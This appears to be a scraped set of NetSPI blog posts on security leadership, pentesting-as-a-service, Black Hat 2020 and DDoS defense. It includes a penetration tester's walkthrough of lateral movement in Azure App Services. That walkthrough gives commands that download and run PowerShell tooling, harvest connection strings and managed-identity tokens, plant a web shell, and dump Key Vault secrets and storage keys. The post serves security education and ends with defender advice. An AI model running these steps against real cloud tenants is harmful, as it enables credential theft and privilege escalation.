Back

Three Keys to Ensuring Application Security from a 40-Year Information Security Veteran

Managing Security in a Regulated Industry

As is the case with any regulated industry, the insurance industry has long been driven by regulatory pressures that compel them to undertake security activities. Over the past 5-10 years or so, the level of regulatory pressure has grown dramatically, forcing regulated industries to take proactive actions to address risk within their environments. At the same time, customers have become savvier and have raised their expectations of what responsible corporate stewardship looks like relative to security and privacy.

The combination of this increased regulatory pressure and higher customer expectations have finally, and relatively swiftly, generated positive movement to address security and privacy risks. The result is active involvement of executives. This contrasts with the snail-like pace of change in the preceding 50 years where the insurance industry was slow to adopt and embrace technology – and adoption of appropriate security and privacy controls was even slower yet!

Most of the regulations are quite explicit about the need to exercise due diligence of your vendors and that’s another difference in the insurance industry – as well as most other regulated industries: if you are not at the very top of the supply chain, you are being constantly audited by your customers as well as the traditional audits conducted by industry regulators and independent audit firms – and once they do, that naturally flows down to other providers in their supply chain.

Advice for Communicating and Working with Organizational Leadership

It’s important to note that I came up, especially during my time in the military, defense, and aerospace industries, in a profession that attempted to drive security improvements using FUD (fear, uncertainty, and doubt), where you’re essentially scaring people into doing the right thing. I’ve found that rarely works well and is not a sustainable approach.

In my more recent roles in the insurance industry, my team and I function as risk managers, and we really do view one of our primary roles as providing illumination of risk and communicating that to appropriate levels of the organization. For me, most of the companies I’ve worked at are mid-sized companies which makes it easier to implement a senior executive oversight committee or steering committee – and I leverage them a lot and with great success. That approach may not work quite as well with very large companies, but the concept is sound.

By getting this steering committee to agree to certain security- and privacy-related objectives, standards, or metrics that are important to them, you can then use their involvement to help accomplish your goals. It also shifts responsibility for executing those changes down the operational business path rather than attempting to force it because “the security team said we must do it.”

I have also always tended to follow an 80/20 rule for addressing risks. It’s not that I don’t care about the 20 percent, but I’ve seen too many times where my peers have set out to boil the ocean and that just doesn’t work. Worse yet, you can seriously damage your credibility with business executives if they perceive your goals as unrealistic. Much better to incrementally pick off chunks, then use the metrics to show success over time.

Application Security: Three Critical Components to Ensuring Security

1. Treat the Platform as a Key Asset and Report on its Security Posture to Executives

I’ve seen most organizations struggle with the application security side including such basic activities as regular security testing. I’m having less trouble these days, and one of the reasons for that is that I get business and IT leaders to identify the key platforms used to run the business and then I report on their security posture.

If you have not done this before, I would suggest starting with the top 5 or 10 platforms – or whatever the right number is based on organizational appetite (again so you are not trying to boil the ocean).

In my current organization, business and IT leaders selected and designated approximately 30 platforms as being “key platforms” to the operation of our business. This is important because we can then start reporting metrics on the posture of that application platform. You can report a wide array of relevant metrics such as: has it been tested dynamically or statically; does it have logging capabilities; are logs being shipped to the SIEM; the number of medium or high severity vulnerabilities; malware protection; DLP; resiliency; or, any other security capabilities that are of interest to your organization. While most of us could easily pick 15-20 metrics we think are important, most organizations cannot really process that many metrics in a meaningful way and, as such, I would suggest sticking to the most important 3-6 metrics that support your objectives.

This report can be as simple as a red, yellow, or green, which is typically what I do because I think there’s a danger in trying to be too precise with things. Sometimes we throw figures out that give the illusion of precision where none exists.  For most organizations, it’s good enough to have red, yellow, and green as long as the criteria for assigning those is clearly defined and well understood. In my experience, when some metric goes from green to yellow or yellow to red, and you’re talking to an EVP, they’re going to want to know why it changed.  More importantly, they’re going to want to solve the problem. Even if they decide to accept the risk, the conversation provides important context for them so that they make informed risk decisions. This approach can also help prepare the organization for financial forecasts for the following year.  or example, if something is going to be a big lift, we can plan to do it next year.  But just maintaining that communication and reporting is important.

Regardless of how you express your metrics, it’s important that the audience that you’re communicating this information to has a hand in crafting what those metrics measure. Each executive has their own their own level of understanding and their own hot button issues that you should be measuring. For example, about half the things that I measure or report on are things that the executives had explicitly indicated they wanted to see. This generates a lot of buy-in and adds value to what you’re reporting.

2. Perform Rigorous Testing

Over the past 10-15 years, I’ve been advocating the use of both dynamic and static application security testing. Widespread adoption has been slow, but I have seen a marked increase in recent years and that’s beginning to bear fruit. For example, I have an application about to go live that the appdev team knew would go through both static and dynamic testing and the results were some of the best I’ve seen. It was clear that the appdev team really made a conscious effort to minimize any identified flaws and the result was a much more secure, stable platform.

3. Educate Developers About Secure Coding Practices

Another component of appsec is making sure the developers are at least aware of secure coding technologies. Certainly, if they’re web developers and they don’t know OWASP, then you need to look for another developer. It’s that simple. However, my team has an important role in identifying appropriate training and leadership has a role in providing the opportunities for developers to participate in that training. Incidentally, metrics around developer training are another useful tool to help drive improvements and they can generally be correlated with reductions in coding flaws and vulnerabilities that make it into production systems.

Back

Four Ways Pentesting is Shifting to an “Always On” Approach

No industry is safe from a cyberattack and last year’s long list of breach victims is testament to that. Within the first six months of 2019, 3,800 breaches were reported, exposing 4.1 billion records. The impact of a breach continues to grow, and the wide-ranging threat landscape continues to shift – thus, our network security testing strategies should evolve in tandem.

Penetration testing has been around for decades and has remained at the foundation of vulnerability testing and management programs. But as the modern enterprise continues to evolve, and attack surfaces become much more complex, pentesting has remained relatively unchanged. Following a pentest, security and IT teams are typically left with an immense amount of vulnerability data that ends up in PDFs with limited context, making it challenging to process and collaborate with development teams for vulnerability remediation. In addition, many organizations struggle with the breadth of their security testing coverage and lack the time or financial resources to adequately pentest all of the applications and systems in their environment – and they can’t remediate all the vulnerabilities from each test. According to Gartner, once a company discloses a vulnerability and releases a patch, it takes 15 days before an exploit appears in the wild.

To ensure critical assets are secure and their entire attack surface has some level of pentesting coverage, today’s modern enterprise requires a more continuous and comprehensive penetration testing process.

Enter Penetration Testing as a Service, or PTaaS: a hybrid approach to security testing that combines manual and automated ethical hacking attempts with 24/7 scanning, consultation and streamlined communication and reporting delivered through a single platform. By delivering pentesting “as a service,” organizations receive a broader, more thorough vulnerability audit year-round instead of relying on point-in-time pentests, which are typically executed just once a year.

Point-in-Time Pentesting Versus PTaaS

While an important starting point, point-in-time penetration testing has its limitations. Once a test has been completed, how can one be sure that no new vulnerabilities arise during the remaining 364 days of the year? To better understand the impact of PTaaS, here are four core differences between point-in-time penetration testing and PTaaS. PTaaS gives organizations:

  1. Visibility and control. Through PTaaS, organizations are put in control of the pentest. Security teams gain the ability to request and scope new engagements, see the progress and status of all open engagements, easily parse the vulnerability trends, and work to understand and verify the effectiveness of remediations, all within a single online platform.
  2. Paths to quicker remediation. The penetration testing reports, often static PDFs, created after a standard pentest leave much to be desired when it comes to vulnerability remediation. On average, it takes 67 days to remediate critical vulnerabilities. PTaaS platforms allow findings to be actionable as they can be sorted, searched, filtered, and audited. As the vulnerability or exploit evolves over time, the data related to it will be updated, not remain unchanged in a document. Additionally, PTaaS provides development teams with the most up-to-date and relevant information for remediation, with assistance and consultation from the team of pentesters who found the vulnerability.
  3. More security testing possibilities. Due to both the cost savings of automation and the efficiency provided for remediating vulnerabilities, companies are able to do more with their budgets and internal resources. The faster vulnerabilities are found and remediated, the quicker the company can move on to protect itself from the next vulnerability.
  4. Prioritized, actionable results. PTaaS platforms, like NetSPI’s Resolve will aggregate and correlate the findings, eliminating manual administrative tasks while providing a result set that drives the right set of actions in an efficient manner for all organizations. According to Gartner, one of the most common ways to fail at vulnerability management is by sending a report with thousands of vulnerabilities for the operations team to fix. Successful vulnerability management programs leverage advanced prioritization techniques and automated workflow tools to streamline the handover to the team responsible for remediation.

What’s fueling the desire for an “as a Service” model for penetration testing?

Businesses, no matter the industry, are constantly changing and are on the lookout for technology that can scale with them. Because of the constant flux that businesses remain in today, whether from engaging in a merger or acquisition or integrating a new software program, there is a desire to uncover the most efficient way to maintain an always-on vulnerability testing strategy, while also ensuring capacity to remediate. PTaaS is scalable, so that organizations of all sizes and maturity can use it to maintain a small part of their security testing program – or the entire program.

Further, heavily regulated industries – such as financial services, healthcare, and government – benefit greatly from an “as a Service” model, given the level of sensitive data stored and pressures of maintaining compliance. With PTaaS, organizations can consume their data, on-demand, in many formats for their various regulatory bodies and gain the visibility to know what is happening in their security testing program, and what actions need to be taken.

PTaaS is the new standard for vulnerability testing and remediation as security teams recognize that annual testing does not enable a proactive security strategy. Pentesting engagements are no longer a once-a-year tool for compliance and have evolved into a critical part of day-to-day security efforts.

Back

Lateral Movement in Azure App Services

We test a lot of web applications at NetSPI, and as everyone continues to move their operations into the cloud, we’re running into more instances of applications being run on Azure App Services.

Top

Whenever we run into an App Services application with a serious vulnerability, I’ll frequently get a ping asking about next steps to take in an Azure environment. This blog will hopefully answer some of those questions.

Initial Access

We will be primarily talking about command execution on an App Services host. There are plenty of other vulnerabilities (SQLi, SSRF, etc.) that we could put into the context of Azure App Services, but we’ll save those for another blog.

For our command injection examples, we’ll assume that you’ve used one of the following methods to execute commands on a system:

  • An uploaded web shell
  • Unintended CMD injection via an application issue
  • Intended CMD Injection through application functionality

Alternatively, keep in mind that Azure Portal Access (with an account with Contributor rights on an app) also allows you to run commands from the App Services Console. This will be important if there’s a higher privileged Managed Identity in use by the app, and we want to use this to escalate Azure permissions.

Cmdsql

For the sake of simplicity, we’ll also assume that this is a relatively clean command injection (See Web Shell), where you can easily see the results of your commands. If we want to get really complicated, we could talk about using side channels to exfiltrate command results, but that’s also for another blog.

Azure “App Services”

To further complicate matters, Azure App Services encompasses “Function Apps” and “App Service Apps”. There are some key differences between the two, but for the purposes of this blog, we’ll consider them to be the same. Additionally, there are Linux and Windows options for both, so we’ll try to cover options for those as well.

If you want to follow along with your own existing App Services app, you can use the Console (or SSH) section in the Development Tools section of the Azure Portal for your App Services app.

Appservices

Choose Your Own Adventure

With command execution on the App Services host, there are a couple of paths that you can take:

Looking Locally

First things first, this is an application server, so you might want to look at the application files.

  • The application source code files can (typically) be found at the %DEPLOYMENT_SOURCE%
  • The actual working files for the application can (typically) be found at %DEPLOYMENT_TARGET%
  • Or /home/site/wwwroot if you’re working with a Linux system
Locally

If you’re operating on a bare bones shell at this point, I would recommend pulling down an appropriate web shell to your %DEPLOYMENT_TARGET% (or /home/site/wwwroot) directory. This will allow you to upgrade your shell and allow you to better explore the host.

Just remember, this app server is likely facing the internet and a web shell without a password easily becomes someone else’s web shell.

Within the source code files, you can also look for common application configuration files (web.config, etc.) that might contain additional secrets that you could use to pivot through to other services (as we’ll see later in the blog).

Looking at the Environment

On an App Services host, most of your configuration variables will be available as environmental variables on the host. These variables will most likely contain keys that we can use to pivot to other Azure services in the subscription.

Since you’re most likely to have a cmd.exe shell, you can just use the “set” command to list out all of the environmental variables. It will look like this (without the redactions):

Env Win

If you’re using PowerShell for your command execution, you can use the “dir env: | ft -Wrap ” command to do the same. Make sure that you’re piping to “ft -wrap” as that will allow the full text values to be returned without being truncated.

Alternatively, if you’re in a Linux shell, you can use the “printenv” command to accomplish the same:

Env Linux

Now that we (hopefully) have some connection strings for Azure services, we can start getting into other services.

Accessing Storage Accounts

If you’re able to find an Azure Storage Account connection string, you should be able to remotely mount that storage account with the Azure Storage Explorer.

Here are a couple of common Windows environmental variables that hold those connection strings:

  • APPSETTING_AzureWebJobsStorage
  • APPSETTING_WEBSITE_CONTENTAZUREFILECONNECTIONSTRING
  • AzureWebJobsStorage
  • WEBSITE_CONTENTAZUREFILECONNECTIONSTRING

Additionally, you may find these strings in the application configuration files. Keep an eye out for any config files containing “core.windows.net”, storage, blob, or file in them.

Using the Azure Storage Explorer, copy the Storage Account connection string and use that to add a new Storage Account.

Storage

Now that you have access to the Storage Account, you should be able to see any files that the application has rights to.

Storage


Accessing Azure SQL Databases

Similar to the Storage Accounts, you may find connection strings for Azure SQL in the configuration files or environmental variables. Most Azure SQL servers that I encounter have access locked down to specific IP ranges, so you may not be able to remotely access the servers from the internet. Every once in a while, we’ll find a server with 0.0.0.0-255.255.255.255 in their allowed list, but that’s pretty rare.

Azuresql

Since direct SQL access from the internet is unlikely, we will need an alternative that works from within the App Services host.

Azure SQL from Windows:

For Windows, we can plug in the values from our connection string and make use of PowerUpSQL to access Azure SQL databases.

Confirm Access to the “sql-test” Database on the “netspi-test” Azure SQL server:

D:homesitewwwroot>powershell -c "IEX(New-Object System.Net.WebClient).DownloadString('https://raw.githubusercontent.com/NetSPI/PowerUpSQL/master/PowerUpSQL.ps1'); Get-SQLConnectionTest -Instance 'netspi-test.database.windows.net' -Database sql-test -Username MyUser -Password 123Password456 | ft -wrap"


ComputerName                     Instance                         Status    
------------                     --------                         ------    
netspi-test.database.windows.net netspi-test.database.windows.net Accessible

Execute a query on the “sql-test” Database on the “netspi-test” Azure SQL server:

D:homesitewwwroot>powershell -c "IEX(New-Object System.Net.WebClient).DownloadString('https://raw.githubusercontent.com/NetSPI/PowerUpSQL/master/PowerUpSQL.ps1'); Get-SQLQuery -Instance 'netspi-test.database.windows.net' -Database sql-test -Username MyUser -Password 123Password456 -Query 'select @@version' | ft -wrap"


Column1                                                                        
-------                                                                        
Microsoft SQL Azure (RTM) - 12.0.2000.8                                        
    Jul 31 2020 08:26:29                                                          
    Copyright (C) 2019 Microsoft Corporation

From here, you can modify the query to search the database for more information.

For more ideas on pivoting via Azure SQL, check out the PowerUpSQL GitHub repository and Scott Sutherland’s NetSPI blog author page.

Azure SQL from Linux:

For Linux hosts, you will need to check the stack that you’re running (Node, Python, PHP, .NET Core, Ruby, or Java). In your shell, “printenv | grep -i version” and look for things like RUBY_VERSION or PYTHON_VERSION.

For simplicity, we will assume that we are set up with the Python Stack and pyodbc is already installed as a module. For this, we will use a pretty basic Python script to query the database.

Other stacks will (most likely) require some different scripting or clients that are more compatible with the provided stack, but we’ll save that for another blog.

Execute a query on the “sql-test” Database on the “netspi-test” Azure SQL server:

root@567327e35d3c:/home# cat sqlQuery.py
import pyodbc
server = 'netspi-test.database.windows.net'
database = 'sql-test'
username = 'MyUser'
password = '123Password456'
driver= '{ODBC Driver 17 for SQL Server}'

with pyodbc.connect('DRIVER='+driver+';SERVER='+server+';PORT=1433;DATABASE='+database+';UID='+username+';PWD='+ password) as conn:
        with conn.cursor() as cursor:
                cursor.execute("SELECT @@version")
                row = cursor.fetchone()
                while row:
                        print (str(row[0]))
                        row = cursor.fetchone()

root@567327e35d3c:/home# python sqlQuery.py
Microsoft SQL Azure (RTM) - 12.0.2000.8
        Jul 31 2020 08:26:29
        Copyright (C) 2019 Microsoft Corporation

Your best bet for deploying this script to the host is probably downloading it from a remote source. Trying to manually edit Python from the Azure web based SSH connection is not going to be a fun time.

More generally, trying to do much of anything in these Linux hosts may be tricky. For this blog, I was working in a sample app that I spun up for myself and immediately ran into multiple issues, so your mileage may vary here.

For more information about using Python with Azure SQL, check out Microsoft’s documentation.

Abusing Managed Identities to Get Tokens

An application/VM/etc. can be configured with a Managed Identity that is given rights to specific resources in the subscription via IAM policies. This is a handy way of granting access to resources, but it can be used for lateral movement and privilege escalation.

We’ve previously covered Managed Identities for VMs on the Azure Privilege Escalation Using Managed Identities blog post. If the application is configured with a Managed Identity, you may be able to use the privileges of that identity to pivot to other resources in the subscription and potentially escalate privileges in the subscription/tenant.

In the next section, we’ll cover getting tokens for a Managed Identity that can be used with the management.azure.com REST APIs to determine the resources that your identity has access to.

Getting Tokens

There are two different ways to get tokens out of your App Services application. Each of these depend on different versions of the REST API, so depending on the environmental variables that you have at your disposal, you may need to choose one or the other.

*Note that if you’re following along in the Console, the Windows commands will require writing that token to a file first, as Curl doesn’t play nice with the Console output.

Windows:

  • MSI Secret Option:
curl "%MSI_ENDPOINT%?resource=https://management.azure.com&api-version=2017-09-01" -H secret:%MSI_SECRET% -o token.txt
type token.txt
  • X-IDENTITY-HEADER Option:
curl "%IDENTITY_ENDPOINT%?resource=https://management.azure.com&api-version=2019-08-01" -H X-IDENTITY-HEADER:%IDENTITY_HEADER% -o token.txt
type token.txt

Linux:

  • MSI Secret Option:
curl "$MSI_ENDPOINT?resource=https://management.azure.com&api-version=2017-09-01" -H secret:$MSI_SECRET
  • X-IDENTITY-HEADER Option:
curl "$IDENTITY_ENDPOINT?resource=https://management.azure.com&api-version=2019-08-01" -H X-IDENTITY-HEADER:$IDENTITY_HEADER

For additional reference material on this process, check out the Microsoft documentation.

These tokens can now be used with the REST APIs to gather more information about the subscription. We could do an entire post covering all of the different ways you can gather data with these tokens, but here’s a few key areas to focus on.

Accessing Key Vaults with Tokens

Using a Managed Identity token, you may be able to pivot over to any Key Vaults that the identity has access to. In order to retrieve these Key Vault values, we will need a token that’s scoped to vault.azure.net. To get this vault token, use the previous process, and change the “resource” URL to https://vault.azure.net.

I would recommend setting two tokens as variables in PowerShell on your own system (outside of App Services):

$mgmtToken = "eyJ0eXAiOiJKV1QiLCJhbGciOiJSU…"
$kvToken = "eyJ0eXAiOiJKV1QiLCJhbGciOiJSU…"

And then pass those two variables into the following MicroBurst functions:

Get-AzKeyVaultKeysREST -managementToken $mgmtToken -vaultToken $kvToken -Verbose
Get-AzKeyVaultSecretsREST -managementToken $mgmtToken -vaultToken $kvToken -Verbose

These functions will poll the subscription for any available Key Vaults, and attempt to read keys/secrets out of the vaults. In the example below, our Managed Identity only had access to one vault (netspi-private) and one secret (TestKey) in that vault.

Keyvault

Accessing Storage Accounts with Tokens

Outside of any existing storage accounts that may be configured in the app (See Above), there may be additional storage accounts that the Managed Identity has access to.

Use the Get-AZStorageKeysREST function within MicroBurst to dump out any additional available storage keys that the identity may have access to. This was previously covered in the Gathering Bearer Tokens from Azure Services blog, but you will want to use a token scope to management.azure.com with this function.

Get-AZStorageKeysREST -token YOUR_TOKEN_HERE

As previously mentioned, we could do a whole series on the different ways that we could use these Managed Identity tokens, so keep an eye out for future posts here.

Conclusion

Got a shell on an Azure App Services host? Don’t assume that the cloud has (yet again) solved all the security problems in the world. There are plenty of options to potentially pivot from the App Services host, and hopefully you can use one of them from here.

From a defender’s perspective, I have a couple of recommendations:

  • Test your web applications regularly
  • Utilize the Azure Web Application Firewalls (WAF) to help with coverage
  • Configure your Managed Identities with least privilege
    • Consider architecture that allows other identities in the subscription to do the heavy lifting
    • Don’t give subscription-wide permissions to Managed Identities

Prior Work

I’ve been working on putting this together for a while, but during that time David Okeyode put out a recording of a presentation he did for the Virtual Azure Community Day that pretty closely follows these attack paths. Check out David’s video for a great walkthrough of a real life scenario.

For other interesting work on Azure tokens, Tenant enumeration, and Azure AD, check out Dirk-jan Mollema‘s work on his blog. – https://dirkjanm.io/

Back

TechTarget: What cybersecurity teams can learn from COVID-19

On August 12, NetSPI Managing Director Nabil Hannan was featured in TechTarget:

There’s a reason why a computer virus is called a “virus,” as they have many similarities to medical viruses. Notably, as medical viruses can have a severe impact on your personal health, a computer virus can severely impact the health of your business. In today’s digital world, a computer virus, a “wormable” remote code execution vulnerability designed to persistently replicate and spread to infect programs and files, can begin causing damage in minutes. Sound familiar? According to the CDC, the virus that causes COVID-19 spreads very easily and sustainably, meaning it spreads from person-to-person without stopping.

With COVID-19 top of mind and making headlines across the globe, CISOs should now take the time to make observations about viruses outside of the technology industry and see how they apply to cybersecurity strategies. So, what exactly can security teams learn from studying medical viruses to ensure the health of a business’ systems and applications? Here are three key considerations.

Read the full article here.

Back

Security Boulevard: 12 Hot Takes on How Red Teaming Takes Pen Testing to the Next Level

On August 11, NetSPI Managing Director Nabil Hannan was featured in Security Boulevard:

Offensive security measures like penetration testing can help enterprises discover the common vulnerabilities and exploitable weaknesses that could put an them at risk of costly cybersecurity incidents. By pitting white hat hackers against an organization’s deployed infrastructure, organizations can gain a better understanding of the flaws they should fix first—namely the ones most likely to be targeted by an everyday criminal.

However, over the years penetration testing services have evolved to be extremely automated and limited in scope. Armed with scanning tools and limited rules of engagements, pen testers tend to focus purely on the technical vulnerabilities within a given system, platform, or segment of the network. Pen tests are usually conducted over short durations of time and their resultant reports offer up recommendations on fixes that architects or developers can make to code and configuration.

Read the full article here.

Back

Black Hat 2020: Highlights from the Virtual Conference; Calls to Action for the Industry

Black Hat looked different this year as the security community gathered on the virtual stage, due to COVID-19 concerns. “Different” doesn’t necessarily carry a negative connotation: the shift not only addressed public safety concerns, but also enabled the security community to critically think about the way we do work in our digital-centric world, particularly at a time where we are increasingly reliant on technology to stay connected.

When scrolling through the countless briefings available, it was clear that politics and COVID-19 remain top-of-mind. So, let’s start with the biggest topic of the week: election security.

Takeaway #1: Securing the Vote Relies on Collaboration… and Testing

Matt Blaze, a Georgetown University security researcher, kicked off the conference with a keynote titled, Stress-Testing Democracy: Election Integrity During a Global Pandemic. In the past, the industry has had conversations about securing voting machines themselves, but this year, the discussions were centered on online and mail-in voting mechanisms and the hacking of the process. Matt shared, “our confidence in the [election] outcome increasingly depends on the mechanisms that we use to vote.” And this year, we are tasked with scaling up mail-in voting mechanisms.

Blaze looked at software as the core of the election security framework, noting that “software is generally hard to secure, even under the best circumstances.” Though we expect a majority of votes to be made via paper ballot, software will still be used in every facet of the election system, from pre-election (ballot definition, machine provisioning) to post-election (tallying results, reporting, audits, and recounts). So, what is the industry to do?

He suggested that election committees prepare for a wide range of scenarios and threats and work towards software independence, though most don’t have the appropriate budgets to do so – a problem all too familiar to the security industry. Because of this, he encouraged the IT community to volunteer their time and become more involved with their local election efforts, specifically, testing the software and machines for vulnerabilities. In a way, he opened the door for ethical hackers, like our team at NetSPI, to get involved. An encouraging call to action that proved realistic during Black Hat occurred when voting machine maker ES&S and cybersecurity firm Synack announced a program to vet ES&S’ electronic poll book and new technologies – a call for “election technology vendors to work with researchers in a more open fashion and recognize that security researchers at large can add a lot of value to the process of finding vulnerabilities that could be exploited by our adversaries,” according to WIRED.

Continuing the narrative of election security, the day two keynote from Renee DiResta, research manager at the Stanford Internet Observatory informed Black Hat attendees of how to use information security to prevent disinformation in mass media (social media, broadcast, online publications). She explained how influence campaigns can skew not only voting results, but also perceptions of companies and, larger-scale, entire countries and governments. She reiterated that disinformation is indeed a cybersecurity problem that CISOs can’t ignore. In another humbling call to action for the security testing community, DiResta suggested, “we need to do more red teaming around social [media] and think of it as a system and [understand] how attacks can impact operations.” Read more about the keynote on ThreatPost.

Takeaway #2: The Importance of Application Security Has Heightened in 2020

Let’s start with healthcare. Amid the current public health pandemic, healthcare systems continue to be a top target for adversaries due to the sensitive and confidential patient records they hold. During Black Hat, the security industry shined a light on some of the various areas of weakness that can be exploited by an attacker. A big one? Healthcare application security.

One conversation that stuck out to me was from the Dark Reading news desk: HealthScare: Prioritizing Medical AppSec Research. In the interview, Seth Fogie, information security director at Penn Medicine, explains why healthcare application vulnerabilities matter in the day-to-day business of providing patient care. He recommends that the security and healthcare communities should have a better line of communication around AppSec research and testing efforts. He would like to see more security professionals asking healthcare administrators which other applications, including third-party vendors, they can assess for vulnerabilities. I agree with his recommendation to raise awareness for application testing in healthcare security as it would add value to the assessments already in effect and ultimately the overall security posture for the organization.

Then, there are web applications, such as virtual meeting and event platforms, that have seen a surge in popularity. Released at Black Hat, researchers found critical flaws in Meetup.com that showcased common gaps in AppSec. Researchers explained how common AppSec flaws cross site scripting and request forgery (both tied to the platform’s API) could have resulted in threat actors redirecting payments and other malicious actions. This is just one example showcased at Black Hat that showed the heightened AppSec risks amid COVID-19, as we continue to shift in-person activities to online platforms.

With NetSPI a Black Hat sponsor, myself and my colleague Jake Reynolds hosted a 20-minute session on revamping application security (AppSec) programs: Extreme Makeover: AppSec Edition. During the session, we explored the various options for testing [SAST, IAST, SCA, manual] and the challenges that exist in current AppSec testing programs and how to “renovate” an AppSec program to ultimately increase time to remediation. Watch the session to learn, through one centralized platform, how to remodel your AppSec program to achieve faster remediation, add context to each vulnerability, enable trends data and reporting functions to track and predict vulnerabilities over time, and reduce false positives.

Takeaway #3: Our Connected Infrastructure Is Vulnerable

As in years past, the Internet of Things (IoT) again took over Black Hat conversations. This year, the research around IoT vulnerabilities proved fascinating. Showcasing the potential impact of IoT infiltration was at the core of the research. Here are some examples:

  • Security researchers at the Sky-Go Team, found more than a dozen vulnerabilities in a Mercedes-Benz E-Class car that allowed them to remotely open its doors and start the engine.
  • Researchers with the Georgia Institute of Technology described how certain high-wattage Internet-connected devices such as smart air-conditioners and electric-vehicle (EV) chargers could be used to manipulate energy markets.
  • And perhaps the most interesting, and alarming: James Pavur, an academic researcher and doctoral candidate at Oxford University, used $300 worth of off-the-shelf equipment to hack satellite internet communications to eavesdrop and intercept signals across the globe.

All these examples highlight how much complexity goes into building systems today. As we continue to increase complexity and inter-connectivity, it becomes more challenging to properly protect these systems from being compromised. At NetSPI, we are constantly working with our clients to help them build well-rounded cyber security initiatives. It’s well understood today that just performing penetration testing near the end of a product’s lifecycle before going to production isn’t adequate from the perspective of security. It’s important to understand various business objectives and implement proper security touchpoints throughout a product’s lifecycle. Vulnerability detection tools have come a long way in the past decade or so. With significant advances in products like SAST, DAST, RASP, IAST, SCA, etc., integrating these tools into the SDLC in earlier phases have been a common approach for many organizations. The true challenge however is determining how to make security as frictionless as possible with the overall product development lifecycle. NetSPI works continually with clients to help them build and implement strategy around their security program based on their business objectives and risk thresholds.

Takeaway #4: We’re Learning More About Securing the Remote Workforce

Lastly, many cloud, container, and remote connection-related sessions were held during the conference. Many of them highlighted the need to reinforce security practices pertaining to remote work, or telecommuting – not surprising, given the state of today’s workforce amid the pandemic.

Black Hat research from Orange Cyber Defense demonstrated that VPN technologies ordinarily used by businesses to facilitate remote access to their networks are “poorly understood, improperly configured and don’t provide the full level of protection typically expected of them.” The researchers attribute the vulnerabilities to a common scenario where the remote worker is connected to Wi-Fi that is untrusted, insecure or compromised. Watch this video interview with the researchers via Security Weekly.

It’s an ever-evolving issue that has warranted additional focus this year and the industry is continuing to learn best practices to achieve a secure remote connection. I would consider this topic a silver lining to the pandemic. It has forced the security industry to learn, better understand, and serve as counsel to organizational leaders on the security considerations that come with scaling up remote workers. A great starting place for remote connection security? Read my recent blog post: Keeping Your Organization Secure While Sending Your Employees to Work from Home.

While we certainly missed the face-to-face connections and networking opportunities, the virtual conference was an invaluable opportunity to hold urgent security conversations around election mechanisms, healthcare systems during the pandemic, application security, the growing remote workforce, and connected devices and infrastructures.

While these were my key takeaways, there were many more discussions that took place – and DefCon continues today with prerecorded presentations and live streamed Q&As and panels on Twitch. Want to explore more Black Hat 2020 news? Check out this Black Hat webpage. We hope to see you next year, hopefully in-person!

Back

CIO.com: 4 hot project management trends — and 4 going cold

On August 4, NetSPI Vice President of Services Operations Nancy Bechthold was featured in CIO.com:

Project management is a slippery target. Once the realm of project managers (PMs) armed with a tracking tool like Microsoft Project, an office, a travel budget, and the 411 on excellent meeting space all over the globe, it has become a role — a mindset even — that’s better served by deep knowledge, leadership skills, negotiation tactics, and an empowered (and now probably remote) team.

Even before the pandemic hit, project management was going through a sea change. But the remote nature of our new normal has accelerated and morphed that change so rapidly that trends are going hot and cold before our eyes.

Read the full article here.

Back

The Rise of DDoS Attacks and How to Stop Them

Distributed Denial of Service (DDoS) attacks have gained celebrity status during COVID-19. In the first quarter of 2020, DDoS attacks in the U.S. rose more than 278% compared to Q1 2019 and more than 542% compared to Q4 2019, according to Nexusguard’s 2020 Threat Report. This increase in attacks is correlated with the increased dependency on remote internet access and online services as many organizations’ workforces continue to work from home amid COVID-19 concerns. With the dependency on remote internet access comes an increased need for Internet Service Providers (ISPs) to monitor and mitigate irregular activity on their networks before it results in server outages or loss of critical resources, data, or money. But ISPs aren’t the only ones that need to be proactive as DDoS attacks continue to rise – their customers will face the same problems if proactive security measures are not in place.

Learning from others: Amazon Web Services (AWS) successfully thwarted the largest DDoS attack ever recorded on its infrastructure, internet infrastructure firms Akamai and Cloudflare fended off record-breaking DDoS attacks in June, and online gaming platforms are being targeted as attackers figure out how to further monetize DDoS attacks (see: GGPoker). These recent attacks underscore how similar vulnerabilities and weaknesses can easily propagate across many organizations since there’s a tendency of reusing similar technologies to support business functions, such as widespread use of open source code or network hardware. Additionally, it’s also common that simple misconfigurations issues can result in breaches that have significant business impact.

It’s important to understand that there are two common forms of DDoS attacks:

  1. Application layer attacks where attackers try to overload a server by sending an overwhelming number of requests that end up overtaking much of the processing power.
  2. Network layer attacks where attackers try to overwhelm network bandwidth and deny service to legitimate network traffic.

The ultimate goal of both techniques is to overwhelm a particular business, service, web app, mobile app, etc. and keep them from being accessible to legitimate access requests from the intended users/customers. This is extremely challenging to manage since the attacks come from compromised machines or ‘bots’ in a very distributed fashion, which makes blocking those requests using simple filtering techniques unrealistic.

Many web application firewall vendors have DDoS mitigation solutions available for customers to buy, but that shouldn’t be the only step that organizations should rely on. Defense in depth, or an approach to cyber security in which defensive tactics are layered to ensure back up measures in the case that another security control fails, is key for all security concepts. Here are five techniques organizations can layer on to stop DDoS attacks:

  1. Penetration Testing – Although it’s difficult to properly simulate full-scale DDoS attacks during a penetration test, it’s important to do regular third-party testing that simulates real-world attacks against your infrastructure and applications. A proactive penetration testing approach will allow organizations to be prepared for when the time comes that they’re actually under attack. Tip: Implement Penetration Testing as a Service (PTaaS) to enable continuous, always-on vulnerability testing.
  2. Vulnerability Management and Patching – Ensure that all your systems have been properly updated to the latest version and any relevant security and/or performance patches have been applied. A proper patching and vulnerability management process will ensure this is happening within a reasonable timeframe and within acceptable risk thresholds for the business.
  3. Incident Response Planning – Build a team whose focus is on responding in an expedited fashion with the appropriate response. This team’s focus needs to be on ensuring they can minimize the impact of the attack and ensure they can trigger the appropriate processes to ensure that communications with customers and internal teams are happening effectively. More on incident response planning here.
  4. Traffic Anomaly Monitoring – Make sure there’s proper monitoring taking place across all network traffic to set off alerts if any abnormal behavior is detected from suspicious sources, especially if they are from geographies that don’t make normal business sense.
  5. Threat Intelligence and Social Media – Keep an eye on threat intel feeds and social media for any relevant information that may help predict attacks before they happen, allowing organizations to plan accordingly.

DDoS is just one of many cyberattack methods that have increased due to COVID-19 remote working dependency. As networks continue to expand, we are opening new entry points to attackers to secure footholds and cause critical damage – pointing to the need for continuous evaluation of security strategies.

My overarching advice? Go beyond the baseline security measures, such as a firewall, and implement a proactive security strategy to identify and remediate vulnerabilities, monitor network activity, plan for a breach as they become more inevitable, and connect with the security community to stay on top of the latest threat intel.

Back

